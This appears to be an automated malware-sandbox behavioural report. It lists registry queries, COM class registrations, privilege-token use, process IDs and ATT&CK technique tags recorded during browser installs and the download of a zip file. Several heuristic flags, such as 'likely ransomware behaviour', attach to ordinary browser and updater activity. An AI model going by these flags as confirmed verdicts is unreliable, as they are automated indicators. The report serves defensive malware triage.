File created	C:\Program Files\Google\Chrome\Temp\source876_1467735484\Chrome-bin\108.0.5359.125\WidevineCdm\manifest.json	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source876_1467735484\Chrome-bin\108.0.5359.125\eventlog_provider.dll	setup.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\VisualElements\	setup-stub.exe
File opened for modification	C:\Program Files\Mozilla Firefox\install.tmp	setup-stub.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 16 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exefirefox.exefirefox.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

2488 net.exe

pid	process
2488	net.exe

Enumerates system info in registry 2 TTPs 12 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exechrome.exechrome.exechrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exenetstat.exe

pid process

1536 ipconfig.exe
4088 netstat.exe

pid	process
1536	ipconfig.exe
4088	netstat.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133166948497481736"	chrome.exe

Modifies registry class 64 IoCs

Processes:

GoogleUpdateComRegisterShell64.exeGoogleUpdateComRegisterShell64.exeGoogleUpdateComRegisterShell64.exeGoogleUpdate.exesetup.exechrome.exefirefox.exeregsvr32.exeOpenWith.exeGoogleUpdate.exeregsvr32.exechrome.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\NumMethods	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{18D0F672-18B4-48E6-AD36-6E6BF01DBBC4}\NumMethods\ = "17"	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\ProxyStubClsid32	GoogleUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\INPROCSERVER32	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{5B25A8DC-1780-4178-A629-6BE8B8DEFAA2}\NumMethods\ = "4"	GoogleUpdate.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{7DE94008-8AFD-4C70-9728-C6FBFFF6A73E}\PROGID	GoogleUpdate.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{25461599-633D-42B1-84FB-7CD68D026E53}\VERSIONINDEPENDENTPROGID	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25461599-633D-42B1-84FB-7CD68D026E53}\LocalServer32\ = "\"C:\\Program Files (x86)\\Google\\Update\\1.3.36.152\\GoogleUpdateOnDemand.exe\""	GoogleUpdate.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\FirefoxPDF-308046B0AF4A39CB\EditFlags = "2"	setup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D}\ProxyStubClsid32	GoogleUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{598FE0E5-E02D-465D-9A9D-37974A28FD42}\PROGID	GoogleUpdate.exe
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\MACHINE\Software\Classes\AppID\{3A93460A-1890-407C-B605-184B8281A181}	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\ProxyStubClsid32	GoogleUpdate.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4}\PROGID	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{CE30F77E-8847-44F0-A648-A9656BD89C0D}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\ProxyStubClsid32	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964}\ProxyStubClsid32	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\NumMethods\ = "24"	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1BAA303D-B4B9-45E5-9CCB-E3FCA3E274B6}	regsvr32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	OpenWith.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1C4CDEFF-756A-4804-9E77-3E8EB9361016}\ = "Google Update Policy Status Class"	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7DE94008-8AFD-4C70-9728-C6FBFFF6A73E}	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{909489C2-85A6-4322-AA56-D25278649D67}\ProxyStubClsid32	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\NumMethods\ = "9"	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DCAB8386-4F03-4DBD-A366-D90BC9F68DE6}\NumMethods	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5B25A8DC-1780-4178-A629-6BE8B8DEFAA2}\ProxyStubClsid32\ = "{BABC0FE1-E9B9-49A3-BBE6-3F16B71DC052}"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\FirefoxURL-308046B0AF4A39CB\ = "Firefox URL"	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{084D78A8-B084-4E14-A629-A2C419B0E3D9}\NumMethods	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\ = "IProgressWndEvents"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D}\ProxyStubClsid32\ = "{BABC0FE1-E9B9-49A3-BBE6-3F16B71DC052}"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ThreadingModel = "Both"	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ADDF22CF-3E9B-4CD7-9139-8169EA6636E4}\ProgID	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0D68D6D0-D93D-4D08-A30D-F00DD1F45B24}\ProxyStubClsid32\ = "{1814CEEB-49E2-407F-AF99-FA755A7D2607}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4E747BE5-2052-4265-8AF0-8ECAD7AAD1C0}\ = "ISimpleDOMText"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1C4CDEFF-756A-4804-9E77-3E8EB9361016}\VersionIndependentProgID	GoogleUpdate.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\FirefoxPDF-308046B0AF4A39CB\FriendlyTypeName = "Firefox PDF Document"	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{27634814-8E41-4C35-8577-980134A96544}\NumMethods	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\ProxyStubClsid32\ = "{BABC0FE1-E9B9-49A3-BBE6-3F16B71DC052}"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.PolicyStatusMachineFallback\ = "Google Update Policy Status Class"	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1814CEEB-49E2-407F-AF99-FA755A7D2607}\ProxyStubClsid32\ = "{1814CEEB-49E2-407F-AF99-FA755A7D2607}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E225E692-4B47-4777-9BED-4FD7FE257F0E}\VersionIndependentProgID\ = "GoogleUpdate.CoreClass"	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\NumMethods	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DCA8D857-1A63-4045-8F36-8809EB093D04}\SynchronousInterface\ = "{CE30F77E-8847-44F0-A648-A9656BD89C0D}"	regsvr32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202020202	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\ProxyStubClsid32	GoogleUpdate.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3900DE1E-5C69-4B8E-B45C-EAC7B693074F}\InprocHandler32	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.Update3WebMachine\ = "Google Update Broker Class Factory"	GoogleUpdate.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{9B2340A0-4068-43D6-B404-32E27217859D}\VERSIONINDEPENDENTPROGID	GoogleUpdate.exe
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\CLSID	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4E223325-C16B-4EEB-AEDC-19AA99A237FA}	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BABC0FE1-E9B9-49A3-BBE6-3F16B71DC052}\InProcServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.152\\psmachine_64.dll"	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\ProxyStubClsid32	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\NumMethods\ = "13"	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{084D78A8-B084-4E14-A629-A2C419B0E3D9}\NumMethods\ = "43"	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964}\ProxyStubClsid32	GoogleUpdateComRegisterShell64.exe

NTFS ADS 3 IoCs

Processes:

firefox.exe

description	ioc	process
File created	C:\Users\Admin\Downloads\Firefox Installer.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\NewRules_GQD5(1).zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\AppData\Local\Temp\NewRules_GQD5.zip:Zone.Identifier	firefox.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exeGoogleUpdate.exeGoogleUpdate.exechrome.exechrome.exesoftware_reporter_tool.exemsedge.exemsedge.exe

pid	process
1244	chrome.exe
1244	chrome.exe
1788	chrome.exe
1788	chrome.exe
2840	chrome.exe
2840	chrome.exe
952	chrome.exe
952	chrome.exe
2420	chrome.exe
2420	chrome.exe
4800	chrome.exe
4800	chrome.exe
2140	chrome.exe
2140	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
3032	chrome.exe
4396	chrome.exe
4396	chrome.exe
3496	chrome.exe
3496	chrome.exe
3336	chrome.exe
3336	chrome.exe
4192	chrome.exe
4192	chrome.exe
1664	chrome.exe
1664	chrome.exe
3728	chrome.exe
3728	chrome.exe
1876	chrome.exe
1876	chrome.exe
2428	chrome.exe
2428	chrome.exe
3776	chrome.exe
3776	chrome.exe
1192	chrome.exe
1192	chrome.exe
1684	chrome.exe
1684	chrome.exe
4328	GoogleUpdate.exe
4328	GoogleUpdate.exe
4328	GoogleUpdate.exe
4328	GoogleUpdate.exe
4328	GoogleUpdate.exe
4328	GoogleUpdate.exe
1796	GoogleUpdate.exe
1796	GoogleUpdate.exe
2252	chrome.exe
2252	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
4768	software_reporter_tool.exe
4768	software_reporter_tool.exe
4328	GoogleUpdate.exe
4328	GoogleUpdate.exe
4328	GoogleUpdate.exe
4328	GoogleUpdate.exe
4624	msedge.exe
4624	msedge.exe
408	msedge.exe
408	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

OpenWith.exefirefox.exe

pid process

2284 OpenWith.exe
1520 firefox.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

rundll32.exerundll32.exe

pid process

2988 rundll32.exe
3548 rundll32.exe

pid	process
2284	OpenWith.exe
1520	firefox.exe

pid	process
2988	rundll32.exe
3548	rundll32.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 58 IoCs

Processes:

chrome.exechrome.exemsedge.exechrome.exe

pid	process
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
408	msedge.exe
408	msedge.exe
408	msedge.exe
408	msedge.exe
408	msedge.exe
408	msedge.exe
408	msedge.exe
752	chrome.exe
752	chrome.exe
752	chrome.exe
752	chrome.exe
752	chrome.exe
752	chrome.exe
752	chrome.exe
752	chrome.exe
752	chrome.exe
752	chrome.exe
752	chrome.exe
752	chrome.exe
752	chrome.exe
752	chrome.exe
752	chrome.exe
752	chrome.exe
752	chrome.exe
752	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

GoogleUpdate.exe108.0.5359.125_chrome_installer.exeGoogleCrashHandler.exeGoogleCrashHandler64.exeGoogleUpdate.exesoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exefirefox.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exepowershell.exechrome.exe

description	pid	process
Token: SeDebugPrivilege	4328	GoogleUpdate.exe
Token: SeDebugPrivilege	4328	GoogleUpdate.exe
Token: SeDebugPrivilege	4328	GoogleUpdate.exe
Token: 33	2688	108.0.5359.125_chrome_installer.exe
Token: SeIncBasePriorityPrivilege	2688	108.0.5359.125_chrome_installer.exe
Token: 33	380	GoogleCrashHandler.exe
Token: SeIncBasePriorityPrivilege	380	GoogleCrashHandler.exe
Token: 33	3132	GoogleCrashHandler64.exe
Token: SeIncBasePriorityPrivilege	3132	GoogleCrashHandler64.exe
Token: SeDebugPrivilege	1796	GoogleUpdate.exe
Token: 33	4504	software_reporter_tool.exe
Token: SeIncBasePriorityPrivilege	4504	software_reporter_tool.exe
Token: 33	4768	software_reporter_tool.exe
Token: SeIncBasePriorityPrivilege	4768	software_reporter_tool.exe
Token: 33	4816	software_reporter_tool.exe
Token: SeIncBasePriorityPrivilege	4816	software_reporter_tool.exe
Token: 33	4180	software_reporter_tool.exe
Token: SeIncBasePriorityPrivilege	4180	software_reporter_tool.exe
Token: SeDebugPrivilege	4328	GoogleUpdate.exe
Token: SeDebugPrivilege	2864	firefox.exe
Token: SeDebugPrivilege	2864	firefox.exe
Token: SeDebugPrivilege	1496	GoogleUpdate.exe
Token: 33	3036	GoogleUpdate.exe
Token: SeIncBasePriorityPrivilege	3036	GoogleUpdate.exe
Token: SeDebugPrivilege	4364	GoogleUpdate.exe
Token: SeDebugPrivilege	4924	GoogleUpdate.exe
Token: SeDebugPrivilege	2864	firefox.exe
Token: SeDebugPrivilege	2864	firefox.exe
Token: SeDebugPrivilege	1756	powershell.exe
Token: SeShutdownPrivilege	752	chrome.exe
Token: SeCreatePagefilePrivilege	752	chrome.exe
Token: SeShutdownPrivilege	752	chrome.exe
Token: SeCreatePagefilePrivilege	752	chrome.exe
Token: SeShutdownPrivilege	752	chrome.exe
Token: SeCreatePagefilePrivilege	752	chrome.exe
Token: SeShutdownPrivilege	752	chrome.exe
Token: SeCreatePagefilePrivilege	752	chrome.exe
Token: SeShutdownPrivilege	752	chrome.exe
Token: SeCreatePagefilePrivilege	752	chrome.exe
Token: SeShutdownPrivilege	752	chrome.exe
Token: SeCreatePagefilePrivilege	752	chrome.exe
Token: SeShutdownPrivilege	752	chrome.exe
Token: SeCreatePagefilePrivilege	752	chrome.exe
Token: SeShutdownPrivilege	752	chrome.exe
Token: SeCreatePagefilePrivilege	752	chrome.exe
Token: SeShutdownPrivilege	752	chrome.exe
Token: SeCreatePagefilePrivilege	752	chrome.exe
Token: SeShutdownPrivilege	752	chrome.exe
Token: SeCreatePagefilePrivilege	752	chrome.exe
Token: SeShutdownPrivilege	752	chrome.exe
Token: SeCreatePagefilePrivilege	752	chrome.exe
Token: SeShutdownPrivilege	752	chrome.exe
Token: SeCreatePagefilePrivilege	752	chrome.exe
Token: SeShutdownPrivilege	752	chrome.exe
Token: SeCreatePagefilePrivilege	752	chrome.exe
Token: SeShutdownPrivilege	752	chrome.exe
Token: SeCreatePagefilePrivilege	752	chrome.exe
Token: SeShutdownPrivilege	752	chrome.exe
Token: SeCreatePagefilePrivilege	752	chrome.exe
Token: SeShutdownPrivilege	752	chrome.exe
Token: SeCreatePagefilePrivilege	752	chrome.exe
Token: SeShutdownPrivilege	752	chrome.exe
Token: SeCreatePagefilePrivilege	752	chrome.exe
Token: SeShutdownPrivilege	752	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exechrome.exe

pid	process
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.exechrome.exemsedge.exe

pid	process
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1788	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
408	msedge.exe
408	msedge.exe
408	msedge.exe
408	msedge.exe
408	msedge.exe
408	msedge.exe
408	msedge.exe
408	msedge.exe
408	msedge.exe
408	msedge.exe
408	msedge.exe
408	msedge.exe
408	msedge.exe
408	msedge.exe
408	msedge.exe
408	msedge.exe

Suspicious use of SetWindowsHookEx 64 IoCs

Processes:

chrome.exechrome.exefirefox.exechrome.exefirefox.exesetup-stub.exeOpenWith.exe

pid	process
4396	chrome.exe
3496	chrome.exe
2864	firefox.exe
400	chrome.exe
1520	firefox.exe
1520	firefox.exe
1520	firefox.exe
1520	firefox.exe
5104	setup-stub.exe
5104	setup-stub.exe
5104	setup-stub.exe
5104	setup-stub.exe
1520	firefox.exe
1520	firefox.exe
1520	firefox.exe
1520	firefox.exe
1520	firefox.exe
1520	firefox.exe
1520	firefox.exe
1520	firefox.exe
1520	firefox.exe
1520	firefox.exe
1520	firefox.exe
1520	firefox.exe
1520	firefox.exe
1520	firefox.exe
1520	firefox.exe
1520	firefox.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
2284	OpenWith.exe
